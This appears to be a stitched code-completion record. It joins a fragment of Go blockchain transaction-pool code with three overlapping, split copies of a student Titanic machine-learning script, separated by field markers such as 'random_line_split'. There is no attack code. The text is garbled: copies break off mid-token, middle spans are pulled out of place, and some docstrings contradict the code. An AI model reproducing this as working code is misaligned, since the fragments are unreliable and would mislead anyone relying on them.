oldSV := pool.stateValidator
pool.stateValidator = validation.NewStateValidate(ledgerStore)
if oldSV != nil {
txch := oldSV.TxInheritance()
for ch := range txch {
pool.TxEnqueue(ch)
}
}
pool.refreshWaitPool()
//log.Info("func txpool RefreshValidator 02", "newTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 02 ", "newTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
func (pool *TxPool) AddTx(tx *types.Transaction) error {
result, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
return err
}
txHash := tx.Hash()
switch result {
case -1:
return err
case 0: //
if uint32(len(pool.txChan)) < pool.maxInQueue {
pool.waitTxNum[txHash]++
if uint32(pool.waitTxNum[txHash]) == config.GlobalConfig.TxPoolCfg.MaxTxInPool { // 下一个块在考虑 尝试四次都失败后执行
pool.waitPool = append(pool.waitPool, tx)
} else if uint32(pool.waitTxNum[txHash]) < config.GlobalConfig.TxPoolCfg.MaxTxInPool {
pool.txChan <- tx
}
} else {
return errors.ERR_TXPOOL_OUTOFMAX
}
return nil
case 1: //
fmt.Printf("validate tx success,txhash=%s\n", txHash.String())
p2ppid, err := bactor.GetActorPid(bactor.P2PACTOR)
if err != nil {
log.Error("tx_pool.go get p2ppid error", "error", err)
} else {
p2ppid.Tell(tx)
}
pool.pdmgr.addTx(tx, pool.maxPending)
return nil
}
return nil
}
func (pool *TxPool) GetTxpoolPID() *actor.PID {
return pool.txpoolPid
}
func (pool *TxPool) TxEnqueue(tx *types.Transaction) error {
log.Info("magnetic try to enqueue", "tx", tx, "queue.size", len(pool.txChan))
//if uint32(pool.queue.Size()) >= pool.maxInQueue {
// return errors.ERR_TXPOOL_OUTOFMAX
//}
if uint32(len(pool.txChan)) >= pool.maxInQueue {
return errors.ERR_TXPOOL_OUTOFMAX
}
log.Info("magnetic enqueue success", "tx", tx, "queue.size", len(pool.txChan))
//pool.queue.Enqueue(tx)
pool.txChan <- tx
return nil
}
/**
generate block
*/
func (pool *TxPool) GenerateBlock(height uint64, packtx bool) *types.Block {
//pool.ticker.Stop()
sts := states.AccountStates{}
var txs *types.Transactions
if packtx {
txs = pool.pdmgr.getTxs(pool.maxPending)
if txs != nil && txs.Len() > 0 {
sort.Sort(txs)
}
}
var txsroot common.Hash
var txns types.Transactions
if txs != nil {
txsroot = txs.GetHashRoot()
txns = *txs
}
block := &types.Block{
Header: &types.Header{
Height: height + 1,
Version: types.TxVersion,
PrevBlockHash: storages.GetLedgerStore().GetCurrentBlockHash(),
LeagueRoot: common.Hash{},
ReceiptsRoot: common.Hash{},
TxRoot: txsroot,
StateRoot: sts.GetHashRoot(),
Timestamp: uint64(time.Now().Unix()),
},
Transactions: txns,
}
return block
}
func (pool *TxPool) ValidateSyncTxs(txhashes []*common.Hash) error {
if pool.pdmgr.pendingTxs == nil || len(pool.pdmgr.pendingTxs) < 1 {
return errors.ERR_TXPOOL_TXNOTFOUND
}
//for _, v := range txhashes {
//vtx := pool.queue.Remove(*v)
//if vtx == nil {
// return errors.ERR_TXPOOL_TXNOTFOUND
//}
//result, err := pool.stateValidator.VerifyTx(vtx)
//
//switch result {
//case -1:
// return err
//case 0:
// if uint32(pool.queue.Size()) < pool.maxInQueue {
// pool.queue.Enqueue(vtx)
// } else {
// return errors.ERR_TXPOOL_OUTOFMAX
// }
// return nil
//case 1:
// pool.pdmgr.addTx(vtx, pool.maxPending)
// return nil
//}
//}
return nil
}
func (pool *TxPool) Execute() *storages.BlockInfo {
log.Info("func txpool Execute", "targetHeight", pool.stateValidator.TargetHeight)
| ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
}*/
objectiveTxs, err := pool.mainRadar.GenerateMainTxs()
if err != nil {
log.Error("GenerateMainTxs failed", "error", err)
}
for _, tx := range objectiveTxs {
if validation.AutoNonceContains(tx.TxType) {
nonce := validation.AccountNonceInstance.GetAccountNonce(tx.TxData.From)
tx.TxData.Nonce = nonce + 1
validation.AccountNonceInstance.SetNonce(tx.TxData.From, nonce+1)
fmt.Println("🚰 Execute txhash", tx.TxData.LeagueId.ToString())
}
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
if ret != 1 {
fmt.Println("🚰 🚰 🚰 objTx verify failed!!! result:", ret, tx.TxType)
}
if tx.TxType == types.ConsensusLeague {
fmt.Printf("🚰 🚰 🚰 ♋️ leagueId:%s startheight:%d endheight:%d energy:%s blockroot:%s\n",
tx.TxData.LeagueId.ToString(),
tx.TxData.StartHeight,
tx.TxData.EndHeight,
tx.TxData.Energy.String(),
tx.TxData.BlockRoot.String())
}
}
return pool.stateValidator.ExecuteOplogs()
}
func (pool *TxPool) RemovePendingTxs(hashes []common.Hash) {
pool.pdmgr.removePendingTxs(hashes)
}
func NewPendingMgr() *PendingMgr {
mgr := new(PendingMgr)
mgr.pendingTxs = make(map[common.Hash]*types.Transaction)
return mgr
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) getTxs(maxInblock uint32) *types.Transactions {
pm.Lock()
defer pm.Unlock()
if len(pm.pendingTxs) < 1 {
return nil
}
txs := make(types.Transactions, 0)
for _, v := range pm.pendingTxs {
txs = append(txs, v)
}
sort.Sort(txs)
le := uint32(len(txs))
if le > maxInblock {
le = maxInblock
}
ret := txs[0:le]
return &ret
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) removePendingTxs(txhashes []common.Hash) {
pm.RLock()
defer pm.RUnlock()
if pm.pendingTxs == nil || len(pm.pendingTxs) < 1 {
return
}
for _, v := range txhashes {
delete(pm.pendingTxs, v)
}
}
/*
add tx to pending transaction list
*/
func (pm *PendingMgr) addTx(tx *types.Transaction, maxPending uint32) error {
pm.Lock()
defer pm.Unlock()
if uint32(len(pm.pendingTxs)) > maxPending {
return errors.ERR_TXPOOL_OUTOFMAX
}
pm.pendingTxs[tx.Hash()] = tx
return nil
} | /*for _, tx := range pool.mustPackTxs { | random_line_split |
titanic5.py | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0) # read the file w/header row #0
# drop columns here
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
""" from string to number
"""
d = { 'male':0, 'female':1 }
return d[s]
df['sex'] = df['sex'].map(tr_mf) # apply the function to the column
df.head() # first five lines
df.info() # column details
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:] # the final testing data
X_train = X_data_full[20:,:] # the training data
y_test = y_data_full[0:20] # the final testing outputs/labels (unknown)
y_train = y_data_full[20:] # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
""" FindBestScore iterates through the n_neighbors model parameter,
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding k value.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
dtree = dtree.fit(cv_data_train, cv_target_train)
dtree.feature_importances_
trainng_score += [dtree.score(cv_data_train,cv_target_train)]
testing_score += [dtree.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decition tree?
By runnint findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008,3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
""" generate dot file for MDT graph """
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
# this next line is where the full training data is used for the model
dtree = dtree.fit(X_data_full, y_data_full)
print("\nCreated and trained a decision tree classifier")
#
# write out the dtree to tree.dot (or another filename of your choosing...)
tree.export_graphviz(dtree, out_file='tree' + str(max_depth) + '.dot', # constructed filename!
feature_names=feature_names, filled=True, rotate=False, # LR vs UD
class_names=target_names, leaves_parallel=True)
print ('write out tree.dot')
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def findRFBestDepth():
""" findRFBestDepth iterates through the model parameter, max_depth
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding max_depth value
when n_estimators is 100.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
""" findRFBestN iterates through the model parameter, n_estimators
between 1 and 200 that is the mutiple of 10 to determine which one
performs best by returning the maximum testing_avgScore and the
corresponding max_depth value when max_depth is 16.
"""
resultList = []
BestScore = 0
nList = [ n for n in range(1,200) if n%10 == 0]
for n in nList:
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score | if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_n = n
resultList += [[n, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding n_estimator is: ')
return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# fit the model using the cross-validation data
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decition tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085 0.532224 0.14179381 0.0545039 0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: compute using KN
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
""" | random_line_split | |
titanic5.py | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0) # read the file w/header row #0
# drop columns here
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
""" from string to number
"""
d = { 'male':0, 'female':1 }
return d[s]
df['sex'] = df['sex'].map(tr_mf) # apply the function to the column
df.head() # first five lines
df.info() # column details
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:] # the final testing data
X_train = X_data_full[20:,:] # the training data
y_test = y_data_full[0:20] # the final testing outputs/labels (unknown)
y_train = y_data_full[20:] # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
""" FindBestScore iterates through the n_neighbors model parameter,
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding k value.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
dtree = dtree.fit(cv_data_train, cv_target_train)
dtree.feature_importances_
trainng_score += [dtree.score(cv_data_train,cv_target_train)]
testing_score += [dtree.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decition tree?
By runnint findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008,3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
""" generate dot file for MDT graph """
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
# this next line is where the full training data is used for the model
dtree = dtree.fit(X_data_full, y_data_full)
print("\nCreated and trained a decision tree classifier")
#
# write out the dtree to tree.dot (or another filename of your choosing...)
tree.export_graphviz(dtree, out_file='tree' + str(max_depth) + '.dot', # constructed filename!
feature_names=feature_names, filled=True, rotate=False, # LR vs UD
class_names=target_names, leaves_parallel=True)
print ('write out tree.dot')
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def findRFBestDepth():
""" findRFBestDepth iterates through the model parameter, max_depth
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding max_depth value
when n_estimators is 100.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_d | # Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
""" findRFBestN iterates through the model parameter, n_estimators
between 1 and 200 that is the mutiple of 10 to determine which one
performs best by returning the maximum testing_avgScore and the
corresponding max_depth value when max_depth is 16.
"""
resultList = []
BestScore = 0
nList = [ n for n in range(1,200) if n%10 == 0]
for n in nList:
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_n = n
resultList += [[n, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding n_estimator is: ')
return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# fit the model using the cross-validation data
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decition tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085 0.532224 0.14179381 0.0545039 0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: compute using KN
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
"""
| ata_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
| conditional_block |
titanic5.py | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0) # read the file w/header row #0
# drop columns here
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
""" from string to number
"""
d = { 'male':0, 'female':1 }
return d[s]
df['sex'] = df['sex'].map(tr_mf) # apply the function to the column
df.head() # first five lines
df.info() # column details
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:] # the final testing data
X_train = X_data_full[20:,:] # the training data
y_test = y_data_full[0:20] # the final testing outputs/labels (unknown)
y_train = y_data_full[20:] # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
""" FindBestScore iterates through the n_neighbors model parameter,
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding k value.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
dtree = dtree.fit(cv_data_train, cv_target_train)
dtree.feature_importances_
trainng_score += [dtree.score(cv_data_train,cv_target_train)]
testing_score += [dtree.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decition tree?
By runnint findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008,3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
""" generate dot file for MDT graph """
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
# this next line is where the full training data is used for the model
dtree = dtree.fit(X_data_full, y_data_full)
print("\nCreated and trained a decision tree classifier")
#
# write out the dtree to tree.dot (or another filename of your choosing...)
tree.export_graphviz(dtree, out_file='tree' + str(max_depth) + '.dot', # constructed filename!
feature_names=feature_names, filled=True, rotate=False, # LR vs UD
class_names=target_names, leaves_parallel=True)
print ('write out tree.dot')
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def find | """ findRFBestDepth iterates through the model parameter, max_depth
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding max_depth value
when n_estimators is 100.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
""" findRFBestN iterates through the model parameter, n_estimators
between 1 and 200 that is the mutiple of 10 to determine which one
performs best by returning the maximum testing_avgScore and the
corresponding max_depth value when max_depth is 16.
"""
resultList = []
BestScore = 0
nList = [ n for n in range(1,200) if n%10 == 0]
for n in nList:
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_n = n
resultList += [[n, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding n_estimator is: ')
return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# fit the model using the cross-validation data
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decition tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085 0.532224 0.14179381 0.0545039 0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
